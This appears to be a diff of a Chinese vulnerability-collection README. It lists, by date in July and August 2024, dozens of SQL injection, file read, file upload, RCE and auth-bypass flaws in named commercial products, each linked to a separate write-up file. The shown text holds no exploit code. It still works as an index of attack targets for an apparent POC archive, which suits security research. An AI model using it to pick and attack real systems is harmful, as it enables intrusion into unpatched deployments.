易捷OA协同办公软件ShowPic接口存在任意文件读取 -- SpringBlade系统usual接口存在SQL注入漏洞 -- 宏景eHR系统ajaxService接口处存在SQL注入漏洞 -- 满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞 -- 蓝凌EKP系统dataxml.tmpl存在命令执行漏洞 -- 云时空社会化商业ERP系统online存在身份认证绕过漏洞 -- PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911) -- 赛蓝企业管理系统GetCssFile存在任意文件读取漏洞 -- Calibre任意文件读取漏洞(CVE-2024-6781) -- Calibre远程代码执行漏洞(CVE-2024-6782) +- [蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181)](./蓝凌OA/蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181).md) +- [世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281)](./世邦通信/世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281).md) +- [泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞](./泛微OA/泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞.md) +- [Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856)](./Apache/Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856).md) +- [易捷OA协同办公软件ShowPic接口存在任意文件读取](./易捷OA/易捷OA协同办公软件ShowPic接口存在任意文件读取.md) +- [SpringBlade系统usual接口存在SQL注入漏洞](./SpringBlade/SpringBlade系统usual接口存在SQL注入漏洞.md) +- [宏景eHR系统ajaxService接口处存在SQL注入漏洞](./宏景OA/宏景eHR系统ajaxService接口处存在SQL注入漏洞.md) +- [满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞](./满客宝智慧食堂系统/满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞.md) +- 
[蓝凌EKP系统dataxml.tmpl存在命令执行漏洞](./蓝凌OA/蓝凌EKP系统dataxml.tmpl存在命令执行漏洞.md) +- [云时空社会化商业ERP系统online存在身份认证绕过漏洞](./云时空/云时空社会化商业ERP系统online存在身份认证绕过漏洞.md) +- [PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911)](./PerkinElmer/PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911).md) +- [赛蓝企业管理系统GetCssFile存在任意文件读取漏洞](./赛蓝企业管理系统/赛蓝企业管理系统GetCssFile存在任意文件读取漏洞.md) +- [Calibre任意文件读取漏洞(CVE-2024-6781)](./Calibre/Calibre任意文件读取漏洞(CVE-2024-6781).md) +- [Calibre远程代码执行漏洞(CVE-2024-6782)](./Calibre/Calibre远程代码执行漏洞(CVE-2024-6782).md) ## 2024.08.04 新增漏洞 -- 同享人力管理管理平台UploadHandler存在任意文件上传漏洞 -- jeecg-boot系统接口jmLink权限绕过漏洞 -- 章管家前台任意文件上传漏洞(XVE-2024-19042) -- 灵动业务架构平台(LiveBOS)系统UploadFile.do接口文件上传漏洞(XVE-2023-21708) -- 灵动业务架构平台(LiveBOS)系统UploadImage接口文件上传漏洞(XVE-2024-18835) -- PEPM系统Cookie存在远程代码执行漏洞(XVE-2024-16919) -- 用友NC系统complainjudge接口SQL注入漏洞(XVE-2024-19043) -- 群杰印章物联网管理平台rest密码重置漏洞(XVE-2024-18945) -- 网神SecGate3600未授权添加用户漏洞 -- 海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞 -- 信呼OA系统index存在SQL注入漏洞 -- 泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞 -- 通天星CMSV6车载视频监控平台SESSION伪造漏洞 -- 小狐狸Chatgpt付费创作系统存在任意文件上传漏洞 +- [同享人力管理管理平台UploadHandler存在任意文件上传漏洞](./同享人力管理管理平台/同享人力管理管理平台UploadHandler存在任意文件上传漏洞.md) +- [jeecg-boot系统接口jmLink权限绕过漏洞](./JeecgBoot/jeecg-boot系统接口jmLink权限绕过漏洞.md) +- [章管家前台任意文件上传漏洞(XVE-2024-19042)](./章管家-印章智慧管理平台/章管家前台任意文件上传漏洞(XVE-2024-19042).md) +- [灵动业务架构平台(LiveBOS)系统UploadFile.do接口文件上传漏洞(XVE-2023-21708)](./LiveBOS/灵动业务架构平台(LiveBOS)系统UploadFile.do接口文件上传漏洞(XVE-2023-21708).md) +- [灵动业务架构平台(LiveBOS)系统UploadImage接口文件上传漏洞(XVE-2024-18835)](LiveBOS/灵动业务架构平台(LiveBOS)系统UploadImage.do接口文件上传漏洞(XVE-2024-18835).md) +- [PEPM系统Cookie存在远程代码执行漏洞(XVE-2024-16919)](./PEPM系统/PEPM系统Cookie存在远程代码执行漏洞(XVE-2024-16919).md) +- [用友NC系统complainjudge接口SQL注入漏洞(XVE-2024-19043)](./用友OA/用友NC系统complainjudge接口SQL注入漏洞(XVE-2024-19043).md) +- [群杰印章物联网管理平台rest密码重置漏洞(XVE-2024-18945)](./群杰印章物联网管理平台/群杰印章物联网管理平台rest密码重置漏洞(XVE-2024-18945).md) +- [网神SecGate3600未授权添加用户漏洞](./网神/网神SecGate3600未授权添加用户漏洞.md) +- 
[海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞](./海康威视/海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞.md) +- [信呼OA系统index存在SQL注入漏洞](./信呼OA/信呼OA系统index存在SQL注入漏洞.md) +- [泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞](./泛微OA/泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞.md) +- [通天星CMSV6车载视频监控平台SESSION伪造漏洞](./通天星/通天星CMSV6车载视频监控平台SESSION伪造漏洞.md) +- [小狐狸Chatgpt付费创作系统存在任意文件上传漏洞](./小狐狸Chatgpt付费创作系统/小狐狸Chatgpt付费创作系统存在任意文件上传漏洞.md) ## 2024.08.01 新增漏洞 -- 海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞 -- 北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞 -- Quicklancer系统接口listing存在SQL注入漏洞 -- KubePi存在JWT验证绕过漏洞(CVE-2024-36111) -- Tenda-FH1201存在命令注入漏洞(CVE-2024-41473) -- Tenda-FH1201存在命令注入漏洞(CVE-2024-41468) -- 海康威视综合安防管理平台clusters接口存在任意文件上传漏洞 -- 广联达OA系统接口ConfigService.asmx存在SQL注入漏洞 -- 广联达OA系统GetSSOStamp接口存在任意用户登录 -- 方天云智慧平台系统Upload.ashx存在任意文件上传漏洞 -- 用友NC-Cloud系统queryStaffByName存在SQL注入漏洞 -- 用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞 -- 契约锁电子签章平台ukeysign存在远程命令执行漏洞 -- AspCMS系统commentList.asp存在SQL注入漏洞 -- 满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926) -- 万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749) -- 深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750) -- 任我行协同CRM系统UploadFile存在反序列化漏洞 -- 方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞 -- 用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞 -- 3C环境自动监测监控系统ReadLog文件读取漏洞 -- ClusterControl存在任意文件读取漏洞 -- 泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞 -- 致远互联FE协作办公平台apprvaddNew存在sql注入漏洞 -- 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞 +- [海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞](./海康威视/海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞.md) +- [北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞](./Panalog/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞.md) +- [Quicklancer系统接口listing存在SQL注入漏洞](./Quicklancer/Quicklancer系统接口listing存在SQL注入漏洞.md) +- [KubePi存在JWT验证绕过漏洞(CVE-2024-36111)](./KubePi/KubePi存在JWT验证绕过漏洞(CVE-2024-36111).md) +- [Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)](./Tenda/Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md) +- [Tenda-FH1201存在命令注入漏洞(CVE-2024-41468)](./Tenda/Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md) +- 
[海康威视综合安防管理平台clusters接口存在任意文件上传漏洞](./海康威视/海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.md) +- [广联达OA系统接口ConfigService.asmx存在SQL注入漏洞](./广联达OA/广联达OA系统接口ConfigService.asmx存在SQL注入漏洞.md) +- [广联达OA系统GetSSOStamp接口存在任意用户登录](./广联达OA/广联达OA系统GetSSOStamp接口存在任意用户登录.md) +- [方天云智慧平台系统Upload.ashx存在任意文件上传漏洞](./方天云智慧平台系统/方天云智慧平台系统Upload.ashx存在任意文件上传漏洞.md) +- [用友NC-Cloud系统queryStaffByName存在SQL注入漏洞](./用友OA/用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md) +- [用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞](./用友OA/用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md) +- [契约锁电子签章平台ukeysign存在远程命令执行漏洞](./契约锁电子签章系统/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md) +- [AspCMS系统commentList.asp存在SQL注入漏洞](./AspCMS/AspCMS系统commentList.asp存在SQL注入漏洞.md) +- [满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926)](./满客宝智慧食堂系统/满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md) +- [万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749)](./万户OA/万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md) +- [深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750)](./深澜计费管理系统/深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750).md) +- [任我行协同CRM系统UploadFile存在反序列化漏洞](./任我行/任我行协同CRM系统UploadFile存在反序列化漏洞.md) +- [方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞](./方天云智慧平台系统/方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞.md) +- [用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞](./用友OA/用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞.md) +- [3C环境自动监测监控系统ReadLog文件读取漏洞](./环境自动监测监控系统/3C环境自动监测监控系统ReadLog文件读取漏洞.md) +- [ClusterControl存在任意文件读取漏洞](./ClusterControl/ClusterControl存在任意文件读取漏洞.md) +- [泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞](./泛微OA/泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞.md) +- [致远互联FE协作办公平台apprvaddNew存在sql注入漏洞](./致远OA/致远互联FE协作办公平台apprvaddNew存在sql注入漏洞.md) +- [赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞](./赛蓝企业管理系统/赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞.md) ## 2024.07.30 新增漏洞 -- RAISECOM网关设备list_base_config.php存在远程命令执行漏洞 -- 用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞 -- 用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞 -- 用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞 -- 用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞 -- 用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞 -- 用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞 -- 
拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞 -- 方天云智慧平台系统GetCompanyItem存在sql注入漏洞 -- 用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞 -- 泛微e-cology接口HrmService前台SQL注入漏洞 -- 杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞 -- 用友U9系统DoQuery接口存在SQL注入 -- 泛微ecology系统setup接口存在信息泄露漏洞 -- eking管理易FileUpload接口存在任意文件上传漏洞 -- SpringBlade系统menu接口存在SQL注入漏洞 -- JeecgBoot反射型XSS漏洞 +- [RAISECOM网关设备list_base_config.php存在远程命令执行漏洞](./RAISECOM网关设备/RAISECOM网关设备list_base_config.php存在远程命令执行漏洞.md) +- [用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞.md) +- [用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md) +- [用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md) +- [用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md) +- [用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md) +- [用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md) +- [拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞](./拓尔思TRS媒资管理系统/拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞.md) +- [方天云智慧平台系统GetCompanyItem存在sql注入漏洞](./方天云智慧平台系统/方天云智慧平台系统GetCompanyItem存在sql注入漏洞.md) +- [用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞](./用友OA/用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞.md) +- [泛微e-cology接口HrmService前台SQL注入漏洞](./泛微OA/泛微e-cology接口HrmService前台SQL注入漏洞.md) +- [杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞](./杭州雄威餐厅数字化综合管理平台/杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞.md) +- [用友U9系统DoQuery接口存在SQL注入](./用友OA/用友U9系统DoQuery接口存在SQL注入.md) +- [泛微ecology系统setup接口存在信息泄露漏洞](./泛微OA/泛微ecology系统setup接口存在信息泄露漏洞.md) +- [eking管理易FileUpload接口存在任意文件上传漏洞](./eking管理易/eking管理易FileUpload接口存在任意文件上传漏洞.md) +- [SpringBlade系统menu接口存在SQL注入漏洞](./SpringBlade/SpringBlade系统menu接口存在SQL注入漏洞.md) +- [JeecgBoot反射型XSS漏洞](./JeecgBoot/JeecgBoot反射型XSS漏洞.md) ## 2024.07.27 新增漏洞 -- 金和OA-C6-GeneralXmlhttpPage.aspx存在SQL注入漏洞 -- 汇智ERP接口filehandle.aspx存在任意文件读取漏洞 -- 赛蓝企业管理系统GetJSFile存在任意文件读取漏洞 -- 赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞 -- 通达OAV11.10接口login.php存在SQL注入漏洞 -- 泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112) -- 
宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞 -- Sharp多功能打印机未授权访问漏洞 -- 天问物业ERP系统ContractDownLoad存在任意文件读取漏洞 -- 金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞 -- 红海云eHR系统kgFile.mob存在任意文件上传漏洞 -- 华天动力OA系统downloadWpsFile存在任意文件读取漏洞 -- 邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞 -- 用友NC系统接口UserAuthenticationServlet存在反序列化RCE漏洞(XVE-2024-18302) -- 用友NC及U8cloud系统接口LoggingConfigServlet存在反序列化漏洞(XVE-2024-18151) -- 金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞 -- 天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞 -- 天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞 -- 浪潮云财务系统xtdysrv.asmx存在命令执行漏洞 -- 瑞斯康达-多业务智能网关-RCE -- 超级猫签名APP分发平台前台存在SQL注入漏洞 -- 超级猫签名APP分发平台前台远程文件写入漏洞 -- T18-1TOTOLINK-A6000R-远程命令执行漏洞 +- [金和OA-C6-GeneralXmlhttpPage.aspx存在SQL注入漏洞](./金和OA/金和OA-C6-GeneralXmlhttpPage.aspx存在SQL注入漏洞.md) +- [汇智ERP接口filehandle.aspx存在任意文件读取漏洞](./汇智ERP/汇智ERP接口filehandle.aspx存在任意文件读取漏洞.md) +- [赛蓝企业管理系统GetJSFile存在任意文件读取漏洞](./赛蓝企业管理系统/赛蓝企业管理系统GetJSFile存在任意文件读取漏洞.md) +- [赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞](./赛蓝企业管理系统/赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞.md) +- [通达OAV11.10接口login.php存在SQL注入漏洞](./通达OA/通达OAV11.10接口login.php存在SQL注入漏洞.md) +- [泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112)](./泛微OA/泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112).md) +- [宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞](./宏脉医美行业管理系统/宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞.md) +- [Sharp多功能打印机未授权访问漏洞](./Sharp/Sharp多功能打印机未授权访问漏洞.md) +- [天问物业ERP系统ContractDownLoad存在任意文件读取漏洞](./天问物业ERP系统/天问物业ERP系统ContractDownLoad存在任意文件读取漏洞.md) +- [金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞](./金慧综合管理信息系统/金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞.md) +- [红海云eHR系统kgFile.mob存在任意文件上传漏洞](./红海云eHR/红海云eHR系统kgFile.mob存在任意文件上传漏洞.md) +- [华天动力OA系统downloadWpsFile存在任意文件读取漏洞](./华天动力/华天动力OA系统downloadWpsFile存在任意文件读取漏洞.md) +- [邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞](./邦永PM2项目管理系统/邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞.md) +- [用友NC系统接口UserAuthenticationServlet存在反序列化RCE漏洞(XVE-2024-18302)](./用友OA/用友NC系统接口UserAuthenticationServlet存在反序列化RCE漏洞(XVE-2024-18302).md) +- [ 
用友NC及U8cloud系统接口LoggingConfigServlet存在反序列化漏洞(XVE-2024-18151)](./用友OA/用友NC及U8cloud系统接口LoggingConfigServlet存在反序列化漏洞(XVE-2024-18151).md) +- [金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞](./金万维-云联应用系统/金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞.md) +- [天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞](./天问物业ERP系统/天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞.md) +- [天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞](./天问物业ERP系统/天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞.md) +- [浪潮云财务系统xtdysrv.asmx存在命令执行漏洞](./浪潮云/浪潮云财务系统xtdysrv.asmx存在命令执行漏洞.md) +- [瑞斯康达-多业务智能网关-RCE](./瑞斯康达/瑞斯康达-多业务智能网关-RCE.md) +- [超级猫签名APP分发平台前台存在SQL注入漏洞](./超级猫签名APP分发平台/超级猫签名APP分发平台前台存在SQL注入漏洞.md) +- [超级猫签名APP分发平台前台远程文件写入漏洞](./超级猫签名APP分发平台/超级猫签名APP分发平台前台远程文件写入漏洞.md) +- [T18-1TOTOLINK-A6000R-远程命令执行漏洞](./路由器/T18-1TOTOLINK-A6000R-远程命令执行漏洞.md) ## 2024.07.24 新增漏洞 -- 通天星CMSV6车载视频监控平台disable存在SQL注入 -- 创客13星零售商城系统前台任意文件上传漏洞 -- 建文工程管理系统BusinessManger.ashx存在SQL注入漏洞 -- 天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞 -- 致远OA系统constDef接口存在代码执行漏洞 -- 启明星辰天玥网络安全审计系统SQL注入漏洞 -- Bazarr任意文件读取(CVE-2024-40348) -- 浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞 -- 建文工程管理系统desktop.ashx存在SQL注入漏洞 -- 帆软系统ReportServer存在SQL注入漏洞导致RCE -- WVP视频平台(国标28181)未授权SQL注入漏洞 -- 用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞 -- 锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞 -- 华磊科技物流modifyInsurance存在sql注入漏洞 -- 华磊科技物流getOrderTrackingNumber存在sql注入漏洞 -- 泛微E-Mobile系统接口installOperate.do存在SSRF漏洞 -- 润乾报表dataSphereServlet接口存在任意文件读取漏洞 -- 联软安渡系统接口queryLinklnfo存在SQL注入漏洞 -- 科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞 -- 科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞 -- Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107) -- 飞讯云MyImportData前台SQL注入(XVE-2024-18113) -- 资管云comfileup.php前台文件上传漏洞(XVE-2024-18154) +- [通天星CMSV6车载视频监控平台disable存在SQL注入](./通天星/通天星CMSV6车载视频监控平台disable存在SQL注入.md) +- [创客13星零售商城系统前台任意文件上传漏洞](./创客13星零售商城系统/创客13星零售商城系统前台任意文件上传漏洞.md) +- [建文工程管理系统BusinessManger.ashx存在SQL注入漏洞](./建文工程管理系统/建文工程管理系统BusinessManger.ashx存在SQL注入漏洞.md) +- [天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞](./天问物业ERP系统/天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞.md) +- 
[致远OA系统constDef接口存在代码执行漏洞](./致远OA/致远OA系统constDef接口存在代码执行漏洞.md) +- [启明星辰天玥网络安全审计系统SQL注入漏洞](./启明星辰/启明星辰天玥网络安全审计系统SQL注入漏洞.md) +- [Bazarr任意文件读取(CVE-2024-40348)](./Bazarr/Bazarr任意文件读取(CVE-2024-40348).md) +- [浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞](./浪潮云/浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞.md) +- [建文工程管理系统desktop.ashx存在SQL注入漏洞](./建文工程管理系统/建文工程管理系统desktop.ashx存在SQL注入漏洞.md) +- [帆软系统ReportServer存在SQL注入漏洞导致RCE](./帆软报表/帆软系统ReportServer存在SQL注入漏洞导致RCE.md) +- [WVP视频平台(国标28181)未授权SQL注入漏洞](./WVP视频平台/WVP视频平台(国标28181)未授权SQL注入漏洞.md) +- [用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞](./用友OA/用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞.md) +- [锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞](./锐捷/锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞.md) +- [华磊科技物流modifyInsurance存在sql注入漏洞](./华磊科技物流/华磊科技物流modifyInsurance存在sql注入漏洞.md) +- [华磊科技物流getOrderTrackingNumber存在sql注入漏洞](./华磊科技物流/华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md) +- [泛微E-Mobile系统接口installOperate.do存在SSRF漏洞](./泛微OA/泛微E-Mobile系统接口installOperate.do存在SSRF漏洞.md) +- [润乾报表dataSphereServlet接口存在任意文件读取漏洞](./润乾报表/润乾报表dataSphereServlet接口存在任意文件读取漏洞.md) +- [联软安渡系统接口queryLinklnfo存在SQL注入漏洞](./联软/联软安渡系统接口queryLinklnfo存在SQL注入漏洞.md) +- [科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞](./科讯图书馆综合管理云平台/科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞.md) +- [科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞](./科讯图书馆综合管理云平台/科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞.md) +- [Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107)](./Apache/Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md) +- [飞讯云MyImportData前台SQL注入(XVE-2024-18113)](./飞讯云/飞讯云MyImportData前台SQL注入(XVE-2024-18113).md) +- [资管云comfileup.php前台文件上传漏洞(XVE-2024-18154)](./资管云/资管云comfileup.php前台文件上传漏洞(XVE-2024-18154).md) ## 2024.07.20 新增漏洞 -- WebLogic远程代码执行漏洞(CVE-2024-21006) -- 广联达OA接口ArchiveWebService存在XML实体注入漏洞 -- 亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞 -- 亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞 -- 云课网校系统文件上传漏洞(DVB-2024-6594) -- 全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞 -- 1Panel面板最新前台RCE漏洞(CVE-2024-39911) -- 用友CRM客户关系管理系统import.php存在任意文件上传漏洞 -- 
致远互联AnalyticsCloud分析云存在任意文件读取漏洞 -- 海洋CMS后台admin_smtp.php存在远程代码执行漏洞 -- DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞 -- DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞 -- fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914) -- LiveNVR流媒体服务软件接口存在未授权访问漏洞 -- 拼团零售商城系统前台任意文件写入漏洞 +- [WebLogic远程代码执行漏洞(CVE-2024-21006)](./Weblogic/WebLogic远程代码执行漏洞(CVE-2024-21006).md) +- [广联达OA接口ArchiveWebService存在XML实体注入漏洞](./广联达OA/广联达OA接口ArchiveWebService存在XML实体注入漏洞.md) +- [亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞.md) +- [亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞.md) +- [云课网校系统文件上传漏洞(DVB-2024-6594)](./云课网校系统/云课网校系统文件上传漏洞(DVB-2024-6594).md) +- [全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞](./全息AI网络运维平台/全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞.md) +- [1Panel面板最新前台RCE漏洞(CVE-2024-39911)](./1Panel/1Panel面板最新前台RCE漏洞(CVE-2024-39911).md) +- [用友CRM客户关系管理系统import.php存在任意文件上传漏洞](./用友OA/用友CRM客户关系管理系统import.php存在任意文件上传漏洞.md) +- [致远互联AnalyticsCloud分析云存在任意文件读取漏洞](./致远OA/致远互联AnalyticsCloud分析云存在任意文件读取漏洞.md) +- [海洋CMS后台admin_smtp.php存在远程代码执行漏洞](./海洋cms/海洋CMS后台admin_smtp.php存在远程代码执行漏洞.md) +- [DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞](./dede/DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞.md) +- [DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞](./dede/DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞.md) +- [fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914)](./fogproject/fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914).md) +- [LiveNVR流媒体服务软件接口存在未授权访问漏洞](./LiveNVR流媒体服务软件/LiveNVR流媒体服务软件接口存在未授权访问漏洞.md) +- [拼团零售商城系统前台任意文件写入漏洞](./拼团零售商城系统/拼团零售商城系统前台任意文件写入漏洞.md) ## 2024.07.17 新增漏洞 -- Nacos远程代码执行漏洞 -- 蓝凌KEP前台RCE漏洞 -- 某自动发卡网alipay_notify.php存在SQL注入漏洞 -- 赛蓝企业管理系统GetExcellTemperature存在SQL注入漏洞 -- SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412) -- Netgear-WN604接口downloadFile.php信息泄露漏洞(CVE-2024-6646) -- 泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞 -- 泛微E-office-10接口leave_record.php存在SQL注入漏洞 -- 
用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞 -- 用友NC-Cloud文件服务器用户登陆绕过漏洞 +- [Nacos远程代码执行漏洞](./Nacos/Nacos远程代码执行漏洞.md) +- [蓝凌KEP前台RCE漏洞](./蓝凌OA/蓝凌KEP前台RCE漏洞.md) +- [某自动发卡网alipay_notify.php存在SQL注入漏洞](./发卡网系统/某自动发卡网alipay_notify.php存在SQL注入漏洞.md) +- [赛蓝企业管理系统GetExcellTemperature存在SQL注入漏洞](./赛蓝企业管理系统/赛蓝企业管理系统GetExcellTemperature存在SQL注入漏洞.md) +- [SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412)](./SuiteCRM/SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412).md) +- [Netgear-WN604接口downloadFile.php信息泄露漏洞(CVE-2024-6646)](./路由器/Netgear-WN604接口downloadFile.php信息泄露漏洞(CVE-2024-6646).md) +- [泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞](./泛微OA/泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞.md) 